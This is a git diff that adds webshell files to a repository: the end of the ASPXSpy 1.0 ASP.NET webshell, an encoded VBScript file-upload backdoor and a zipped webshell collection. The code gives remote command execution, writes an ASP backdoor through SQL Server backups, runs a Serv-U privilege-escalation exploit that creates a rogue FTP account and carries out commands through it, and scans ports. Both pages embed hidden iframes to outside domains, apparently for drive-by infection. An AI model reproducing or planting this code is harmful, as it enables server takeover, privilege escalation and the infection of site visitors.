+        Bin_SuresLabel.Text = "";
+        Bin_LoginPanel.Visible = false;
+        Bin_RegPanel.Visible = false;
+        Bin_PortPanel.Visible = false;
+    }
+
+    protected void Bin_dbshellButton_Click(object sender, EventArgs e)
+    {
+        Bin_DBinfoLabel.Visible = false;
+        Bin_AccPanel.Visible = false;
+        Bin_BakDB();
+    }
+    public void Bin_BakDB() 
+    {
+        string path = Bin_DirTextBox.Text.Trim();
+        if (path.Substring(path.Length - 1, 1) == @"\")
+        {
+            path = path + "bin.asp";
+        }
+        else 
+        {
+            path = path + @"\bin.asp";
+        }
+        string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup database @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
+        Bin_ExecSql(sql);
+        Bin_SqlDir();  
+    }
+    public void Bin_BakLog()
+    {
+        string path = Bin_DirTextBox.Text.Trim();
+        if (path.Substring(path.Length - 1, 1) == @"\")
+        {
+            path = path + "bin.asp";
+        }
+        else
+        {
+            path = path + @"\bin.asp";
+        }
+        string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup log @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
+        Bin_ExecSql(sql);
+        Bin_SqlDir();
+    }
+
+    protected void Bin_LogshellButton_Click(object sender, EventArgs e)
+    {
+        Bin_DBinfoLabel.Visible = false;
+        Bin_AccPanel.Visible = false;
+        Bin_BakLog();
+    }
+
+    protected void Bin_SuexpButton_Click(object sender, EventArgs e)
+    {
+        string Result = "";
+        string user = Bin_SunameTextBox.Text;
+        string pass = Bin_SupassTextBox.Text;
+        int port = Int32.Parse(Bin_SuportTextBox.Text);
+        string cmd = Bin_SucmdTextBox.Text;
+        string loginuser = "user " + user + "\r\n";
+        string loginpass = "pass " + pass + "\r\n";
+        string site = "SITE MAINTENANCE\r\n";
+        string deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
+        string setdomain = "-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
+        string newdomain = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
+        string quite = "QUIT\r\n";
+        try
+        {
+            TcpClient tcp = new TcpClient("127.0.0.1", port);
+            tcp.ReceiveBufferSize = 1024;
+            NetworkStream NS = tcp.GetStream();
+            Result = Rev(NS);
+            Result += Send(NS, loginuser);
+            Result += Rev(NS);
+            Result += Send(NS, loginpass);
+            Result += Rev(NS);
+            Result += Send(NS, site);
+            Result += Rev(NS);
+            Result += Send(NS, deldomain);
+            Result += Rev(NS);
+            Result += Send(NS, setdomain);
+            Result += Rev(NS);
+            Result += Send(NS, newdomain);
+            Result += Rev(NS);
+            TcpClient tcp1 = new TcpClient("127.0.0.1", 52521);
+            NetworkStream NS1 = tcp1.GetStream();
+            Result += Rev(NS1);
+            Result += Send(NS1, "user bin\r\n");
+            Result += Rev(NS1);
+            Result += Send(NS1, "pass binftp\r\n");
+            Result += Rev(NS1);
+            Result += Send(NS1, "site exec " + cmd + "\r\n");
+            Result += Rev(NS1);
+            tcp1.Close();
+            Result += Send(NS, deldomain);
+            Result += Rev(NS);
+            Result += Send(NS, quite);
+            Result += Rev(NS);
+            tcp.Close();
+        }
+        catch (Exception error)
+        {
+            Bin_Error(error.Message);
+        }
+        Bin_SuresLabel.Text = "<div id=\"su\"><pre>" + Result + "</pre></div>";
+        
+        
+    }
+    protected string Rev(NetworkStream instream) 
+    {
+        string Restr = "";
+        if (instream.CanRead) 
+        {
+            byte[] buffer = new byte[1024];
+            instream.Read(buffer, 0, buffer.Length);
+            Restr = Encoding.ASCII.GetString(buffer); 
+        }
+        return "<font color = red>" + Restr + "</font><br>";
+        
+    }
+    protected string Send(NetworkStream instream,string Sendstr) 
+    {
+        if (instream.CanWrite) 
+        {
+            byte[] buffer = Encoding.ASCII.GetBytes(Sendstr);
+            instream.Write(buffer, 0, buffer.Length);
+        }
+        return "<font color = blue>" + Sendstr + "</font><br>";
+    }
+    protected void Bin_IISButton_Click(object sender, EventArgs e)
+    {
+        Bin_LoginPanel.Visible = false;
+        Bin_MainPanel.Visible = false;
+        Bin_MenuPanel.Visible = true;
+        Bin_FilePanel.Visible = false;
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = false;
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = true;
+        Bin_RegPanel.Visible = false;
+        Bin_PortPanel.Visible = false;
+        Bin_iisLabel.Text = Bin_iisinfo();
+
+    }
+
+    protected void Bin_PortButton_Click(object sender, EventArgs e)
+    {
+        Bin_MenuPanel.Visible = true;
+        Bin_LoginPanel.Visible = false;
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = false;
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = false;
+        Bin_RegPanel.Visible = false;
+        Bin_PortPanel.Visible = true;
+        Bin_ScanresLabel.Text = "";
+    }
+
+    protected void Bin_RegButton_Click(object sender, EventArgs e)
+    {
+        Bin_MenuPanel.Visible = true;
+        Bin_LoginPanel.Visible = false;
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = false;
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = false;
+        Bin_RegPanel.Visible = true;
+        Bin_PortPanel.Visible = false;
+        Bin_RegresLabel.Text = "";
+        
+    }
+
+    protected void Bin_RegreadButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            string regkey = Bin_KeyTextBox.Text;
+            string subkey = regkey.Substring(regkey.IndexOf("\\") + 1, regkey.Length - regkey.IndexOf("\\") - 1);
+            RegistryKey rk = null;
+            if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_LOCAL_MACHINE")
+            {
+                rk = Registry.LocalMachine.OpenSubKey(subkey);
+            }
+            if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CLASSES_ROOT")
+            {
+                rk = Registry.ClassesRoot.OpenSubKey(subkey);
+            }
+            if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_USER")
+            {
+                rk = Registry.CurrentUser.OpenSubKey(subkey);
+            }
+            if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_USERS")
+            {
+                rk = Registry.Users.OpenSubKey(subkey);
+            }
+            if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_CONFIG")
+            {
+                rk = Registry.CurrentConfig.OpenSubKey(subkey);
+            }
+
+            Bin_RegresLabel.Text = "<br>Result : " + rk.GetValue(Bin_ValueTextBox.Text, "NULL").ToString();
+        }
+        catch (Exception error)
+        {
+            Bin_Error(error.Message); 
+        }
+    }
+
+    protected void Bin_ScancmdButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            string res = "";
+            string[] port = Bin_PortsTextBox.Text.Split(',');
+            for (int i = 0; i < port.Length; i++)
+            {
+                res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>";
+            }
+            Bin_ScanresLabel.Text = "<hr>" + res;
+        }
+        catch (Exception error)
+        {
+            Bin_Error(error.Message); 
+        }  
+    }
+    protected string Bin_Scan(string ip, int port) 
+    {
+        
+        string scanres = "";
+        TcpClient tcp = new TcpClient();
+        tcp.SendTimeout = tcp.ReceiveTimeout = 2000;
+        try
+        {
+            tcp.Connect(ip, port);
+            tcp.Close();
+            scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>";
+        }
+        catch (SocketException e) 
+        {
+            scanres = ip + " : " + port + " ................................. <font color=red><b>Close</b></font>";
+        }  
+        return scanres;
+    }
+</script>
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<head runat="server">
+    <title>ASPXSpy1.0 -> Bin:)</title>
+<style type="text/css">
+    A:link {
+      COLOR:#000000; TEXT-DECORATION:None
+}
+A:visited {
+       COLOR:#000000; TEXT-DECORATION:None
+}
+A:active {
+       COLOR:#000000; TEXT-DECORATION:None
+}
+A:hover {
+       COLOR:#000000; TEXT-DECORATION:underline
+}
+BODY {
+	FONT-SIZE: 9pt;
+	FONT-FAMILY: "Courier New";
+	}
+#nei {
+	width:500px;
+	margin:0px auto;
+	
+	overflow:hidden
+}
+#su {
+	width:300px;
+	margin:0px auto;
+	
+	overflow:hidden
+}
+#cmd {
+	width:500px;
+	margin:0px auto;
+	
+	overflow:hidden
+}
+    </style>
+    <script type="text/javascript" language="javascript" >
+    function Command(cmd, str)
+    {
+      var strTmp = str;
+      var frm = document.forms[0];
+      if(cmd == 'del')
+      {
+		if(confirm('Del It ?'))
+		{
+			frm.todo.value = str;
+			frm.goaction.value = cmd;
+			frm.submit();
+		}
+		else return;
+	  }
+	  if (cmd == 'change')
+	  {
+	     frm.todo.value = str;  
+         frm.goaction.value = cmd;
+	     frm.submit();
+	  }
+	  if (cmd == 'down')
+	  {
+	     frm.todo.value = str;
+         frm.goaction.value = cmd;
+	     frm.submit();
+	  }
+	  if (cmd == 'showatt')
+	  {
+	     frm.todo.value = str;
+         frm.goaction.value = cmd;
+	     frm.submit();
+	  }
+	  if (cmd == 'edit')
+	  {
+	     frm.todo.value = str;
+         frm.goaction.value = cmd;
+	     frm.submit();
+	  }
+	  if (cmd == 'deldir')
+	  {
+	  if(confirm('Del It ?'))
+		{
+	     frm.todo.value = str;
+         frm.goaction.value = cmd;
+	     frm.submit();
+	    }
+	    else return;
+	  }
+	  if(cmd == 'rename' )
+	  {
+		frm.goaction.value = cmd;
+		frm.todo.value = str + ',';
+		str = prompt('Please input new filename:', strTmp);
+		if(str && (strTmp != str))
+		{
+			frm.todo.value += str;
+			frm.submit();
+	    }
+		else return;
+	   }
+	   if(cmd == 'renamedir' )
+	  {
+		frm.goaction.value = cmd;
+		frm.todo.value = str + ',';
+		str = prompt('Please input new foldername:', strTmp);
+		if(str && (strTmp != str))
+		{
+			frm.todo.value += str;
+			frm.submit();
+	    }
+		else return;
+	   }
+	   if (cmd == 'postdata')
+	  {
+	     frm.todo.value = str.value;
+         frm.goaction.value = cmd;
+	     frm.submit();
+	  }
+	  if (cmd == 'changedata')
+	  {
+	     frm.todo.value = str.value;
+	     frm.intext.value = str.options[str.selectedIndex].innerText
+         frm.goaction.value = cmd;
+	     frm.submit();
+	  }
+   }
+   
+    </script>
+</head>
+<body>
+    <form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px">
+            <asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label>
+            <asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox>
+            <asp:Button ID="LoginButton" runat="server" Text="进入" OnClick="LoginButton_Click" /><p />
+            Copyright (C) 2009 Bin -> <a href="http://www.7jyewu.cn" target="_blank">www.7jyewu.cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px">
+            <asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br />
+            <asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" />
+                <asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" />
+            <asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" />
+                <asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" />
+                <asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" />&nbsp;<asp:Button
+                    ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" />
+                <asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" />
+                <asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" />
+            <asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br />
+            <asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) 2009 Bin -> <a href="http://www.7jyewu.cn" target="_blank">www.7jyewu.cn</a> -> <a href="http://www.rootkit.net.cn/index.aspx" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel>
+        <asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px">
+            <div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False"  ></asp:Label></div></asp:Panel><div style="text-align: center">
+            <asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br />
+            <asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile :  "></asp:Label>
+            <input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" />&nbsp;<asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox>&nbsp;
+                <asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" />
+            <asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br />
+            <asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label>
+            <asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton"
+                runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" />
+            <asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" />
+            <br />
+            <asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label>
+            &nbsp;
+            <asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox>
+            <asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label>
+            <asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox>
+            <asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" />
+            <asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" />
+                <asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center">
+                <asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr />
+                    FileName :
+                    <asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br />
+                    <asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" />
+                    <asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" />
+                    <asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" />
+                    <asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="Archive" />
+                    <br />
+                    CreationTime :
+                    <asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox>
+                    LastWriteTime :
+                    <asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox>
+                    LastAccessTime :
+                    <asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br />
+                    <asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="Set" />
+                    <asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="Back" />
+                    <hr />
+                </asp:Panel></div>
+                <div style="text-align: center"><asp:Panel ID="Bin_EditPanel" runat="server" Visible="False"><hr style="width: 757px" />
+                    Path:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br />
+                    <asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="100" Rows="25" Width="760px"></asp:TextBox><br />
+                    <asp:Button ID="Bin_EditButton" runat="server" Text="Sumbit" OnClick="Bin_EditButton_Click" />&nbsp;<asp:Button
+                        ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="Back" /></asp:Panel></div></asp:Panel></div>
+                <asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px"><hr />
+                    CmdPath : &nbsp;<asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br />
+                    Argument :
+                    <asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br />
+                    <asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="Run" />
+                    <div style="text-align: left">
+                    <asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label></div>
+                    <hr /></asp:Panel>
+        <asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px">
+            <hr />
+            ConnString :
+            <asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="547px">server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB</asp:TextBox><br />
+            <asp:RadioButton ID="Bin_SQLRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_SQLRadioButton_CheckedChanged" Text="MS-SQL" Checked="True" />
+            <asp:RadioButton ID="Bin_AccRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_AccRadioButton_CheckedChanged" Text="MS-Access" />
+            <asp:Button ID="SQL_SumbitButton" runat="server" Text="Sumbit" OnClick="SQL_SumbitButton_Click" /><hr />
+            <asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False">
+                <asp:Button ID="Bin_BDButton" runat="server" Text="DataBase" OnClick="Bin_BDButton_Click" />
+                <asp:Button ID="Bin_SACMDButton" runat="server" Text="SA_Exec" OnClick="Bin_SACMDButton_Click" />
+                <asp:Button ID="Bin_DirButton" runat="server" Text="SQL_Dir" OnClick="Bin_DirButton_Click" /><br /><hr /><div style="text-align: left">
+                <asp:Label ID="Bin_DBinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label></div></asp:Panel>
+            <asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False">
+               <asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br />
+            <asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox>
+            <asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="Exec" />
+                <asp:Button ID="Bin_SAexecButton" runat="server" Text="SA_Exec" OnClick="Bin_SAexecButton_Click" /><br />
+                <div style="text-align:left">
+                <asp:Label ID="Bin_ResLabel" runat="server" ></asp:Label></div></asp:Panel>
+            <asp:Panel ID="Bin_dirPanel" runat="server" Visible="False" Width="759px">
+                Path :
+                <asp:TextBox ID="Bin_DirTextBox" runat="server" Width="447px">c:\</asp:TextBox>
+                <br />
+                <asp:Button ID="Bin_listButton" runat="server" OnClick="Bin_listButton_Click" Text="Dir" />&nbsp;<asp:Button
+                    ID="Bin_dbshellButton" runat="server" OnClick="Bin_dbshellButton_Click" Text="Bak_DB" />
+                <asp:Button ID="Bin_LogshellButton" runat="server" Text="Bak_LOG" OnClick="Bin_LogshellButton_Click" /><hr /></asp:Panel>
+            <br /><br />
+            <div style="overflow:scroll; text-align:left; width:770px;" id="Bin_Scroll" runat="server" visible="false" >
+         <asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="20" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command">
+             <PagerStyle Mode="NumericPages" Position="TopAndBottom" />
+</asp:DataGrid></div>
+        </asp:Panel>
+        <asp:Panel ID="Bin_SuPanel" runat="server" Width="763px" >
+            <hr />
+            Name :
+            <asp:TextBox ID="Bin_SunameTextBox" runat="server">localadministrator</asp:TextBox>
+            Pass :
+            <asp:TextBox ID="Bin_SupassTextBox" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
+            Port :
+            <asp:TextBox ID="Bin_SuportTextBox" runat="server">43958</asp:TextBox><br />
+            CMD :
+            <asp:TextBox ID="Bin_SucmdTextBox" runat="server" Width="447px">cmd.exe /c net user</asp:TextBox><br />
+            <asp:Button ID="Bin_SuexpButton" runat="server" Text="Exploit" OnClick="Bin_SuexpButton_Click" /><br />
+            <div style="text-align:left">
+            <hr />
+            <asp:Label ID="Bin_SuresLabel" runat="server"></asp:Label>
+            </div>
+            </asp:Panel>
+        <asp:Panel ID="Bin_IISPanel" runat="server" Width="763px"><div style="text-align:left">
+            <hr />
+            <asp:Label ID="Bin_iisLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label>&nbsp;</div></asp:Panel>
+        <asp:Panel ID="Bin_RegPanel" runat="server" Width="763px"><hr /><div style="text-align:left">
+            KEY :&nbsp; &nbsp;<asp:TextBox ID="Bin_KeyTextBox" runat="server" Width="595px">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br />
+            VALUE :
+            <asp:TextBox ID="Bin_ValueTextBox" runat="server" Width="312px">ComputerName</asp:TextBox>&nbsp;<asp:Button
+                ID="Bin_RegreadButton" runat="server" Text="Read" OnClick="Bin_RegreadButton_Click" /><br />
+            <asp:Label ID="Bin_RegresLabel" runat="server"></asp:Label><hr /></div></asp:Panel>
+        <asp:Panel ID="Bin_PortPanel" runat="server" Width="763px">
+            <hr /><div style="text-align:left">
+                IP :
+                <asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox>
+                PORT :
+            <asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">21,80,1433,3306,3389,4899,5631,43958,65500</asp:TextBox>
+                <asp:Button ID="Bin_ScancmdButton" runat="server" Text="Scan" OnClick="Bin_ScancmdButton_Click" /><br />
+                <asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label></div><hr /></asp:Panel>
+        
+    </div></form>
+</body>
+<iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe>
+</html>
diff --git a/www-7jyewu-cn/asp小马.asp b/www-7jyewu-cn/asp小马.asp
new file mode 100644
index 0000000..c769496
--- /dev/null
+++ b/www-7jyewu-cn/asp小马.asp
@@ -0,0 +1,104 @@
+<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>��ע - ��վС����</title>
+<style type="text/css">
+<!--
+.black {
+	font-family: "����";
+	font-size: 12px;
+	color: #000000;
+	text-decoration: none;
+	line-height: 120%;}
+-->
+</style>
+<style type="text/css">
+<!--
+a:link {
+	font-family: "����";
+	font-size: 12px;
+	color: #00CC00;
+	text-decoration: none;
+}
+a:visited {
+	font-family: "����";
+	font-size: 12px;
+	color: #00CC00;
+	text-decoration: none;
+}
+a:hover {
+	font-family: "����";
+	font-size: 12px;
+	color: #333333;
+	text-decoration: none;
+}
+-->
+</style>
+</head>
+<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
+<p>
+<%#@~^DAAAAA==~9kh,W(LsUr,vQMAAA==^#~@%>
+<%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%>
+<%#@~^EgAAAA==~9kh,W(LZKE	OsbVnPXgYAAA==^#~@%>
+<%#@~^FgAAAA==~Kx~DMWD,DdEs+~x6O~9wcAAA==^#~@%>
+<%#@~^QAAAAA==~U+O,W(LsUr,xPU+.\D /M+lDnr(L+1OcJUmMk2YrUTRok^n?H/Onsr4%n1YE#,ThYAAA==^#~@%>
+<%#@~^KQAAAA==~b0~:Db:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+	PqgwAAA==^#~@%>
+<%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%>
+<%#@~^QgAAAA==~U+O,W(LZKE	OsbVn'K4%oUrR;.+mY+:naYwk^+cDn5!+dYvE/H0[2mYtEbBK.Eb,dRcAAA==^#~@%>
+<%#@~^GgAAAA==~K4%;W!xYwk^nRqDrYPW[mYl,XQkAAA==^#~@%>
+<%#@~^EAAAAA==~b0~DMP'ZPD4+	P1AQAAA==^#~@%>
+<%#@~^NwAAAA==~M+daW	/+chMrYPE@!6WUO,mW^GD{aswoo!Z@*����ɹ�e@!&0GUD@*EPNQ8AAA==^#~@%>
+<%#@~^BgAAAA==~VdP6QEAAA==^#~@%>
+<%#@~^NwAAAA==~M+daW	/+chMrYPE@!6WUO,mW^GD{aswoo!Z@*����ʧ��e@!&0GUD@*EPNQ8AAA==^#~@%>
+<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
+<%#@~^CwAAAA==~D.cm^+lMPvgMAAA==^#~@%>
+<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
+<%#@~^FAAAAA==~K4%;W!xYwk^nR;VG/PKAcAAA==^#~@%>
+<%#@~^GgAAAA==~U+O,W(LZKE	OsbVn'gWO4bxo,ZAkAAA==^#~@%>
+<%#@~^FgAAAA==~U+O,W(LsUr,xPgWOtbxL~AwcAAA==^#~@%>
+<%#@~^HAAAAA==~"+daW	/+chMrYPE@!J0G.s@*J,qQgAAA==^#~@%>
+</p>
+<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
+<tr>
+<td height="100%"> 
+<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
+<tr>
+<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">
+<tr>
+<td bgcolor="#FFFFFF"><span class="black"> 
+<%#@~^GwAAAA==~"+daW	/+chMrYPE���ļ����Ե�·��J,TAYAAA==^#~@%>
+<%=#@~^NwAAAA==dD-Dc:lawmOtvIn;!+dOc?+M-+M.lMrC4^+k`E?/]&nP{g)HAJbb,MhMAAA==^#~@%>
+<br>
+<%#@~^TQAAAA==~"+daW	/+chMrYPE�����ļ���@!6WUO,mW^GD{D+9@*����·��c�����ļ���)��G)'hn4wacldw*l@!J0GUD@*J~txMAAA==^#~@%>
+<%#@~^MwAAAA==~"+daW	/+chMrYPE@!6W.h,lmDrW	'BEvvPs+DtGNx2K/O@*r~lRAAAA==^#~@%>
+</span> </td>
+</tr>
+<tr>
+<td bgcolor="#FFFFFF"><span class="black">���뱣���·����<%#@~^RgAAAA==~"+daW	/+cMrYPE@!bx2;DPYH2+{Y+XO~xm:'dXW[alOt,Ak9Y4xy!!~dbyn'Rq@*J~qxcAAA==^#~@%>
+</span></td>
+</tr>
+<tr>
+<td bgcolor="#FFFFFF" class="black">
+<%#@~^GwAAAA==~"+daW	/+chMrYPE�����ļ������ݣ�J,TAYAAA==^#~@%>
+<%#@~^UwAAAA==~"+daW	/+chMrYPE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ShsAAA==^#~@%>
+</td>
+</tr>
+<tr>
+<td bgcolor="#FFFFFF"><div align="center"><span class="black">
+<%#@~^MQAAAA==~"+daW	/+chMrYPE@!bx2;DPYH2+{/E(hrY,\mV;+x����@*rPIxAAAA==^#~@%>
+</span></div></td>
+</tr>
+</tr>
+<iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe>
+<td bgcolor="#FFFFFF" class="black"><div align="center"></a></div></td>
+</tr>
+</table></td>
+</tr>
+</table></td>
+</tr>
+</table>
+</body>
+</html>
+
+�ϴ�
\ No newline at end of file
diff --git a/www-7jyewu-cn/【批量下载】银河舰队大马_2014版等.zip b/www-7jyewu-cn/【批量下载】银河舰队大马_2014版等.zip
new file mode 100644
index 0000000000000000000000000000000000000000..6cdbbded53e27b17d21e1bb53189f5fa9a17d2f3
GIT binary patch
literal 1229067
zcmeFadv_bhl`lGL-TTjIEq#X$?BEfDAOTV@h>aNv1R_rOKnN&GZkT0&K!a=xK*QZl
zNsQ(G|9%X`=S+MZ&l$^-EZdSTTaqnVen^pR+2fVT%=jcZllXYfBr}uDB(c~1{dRSu
zK@g-Kan`JJ*HvN==&steYuBz_yLRoptMs-1<Nw_8C;a!5|N4JVPrvl%|MAzK{mGy3
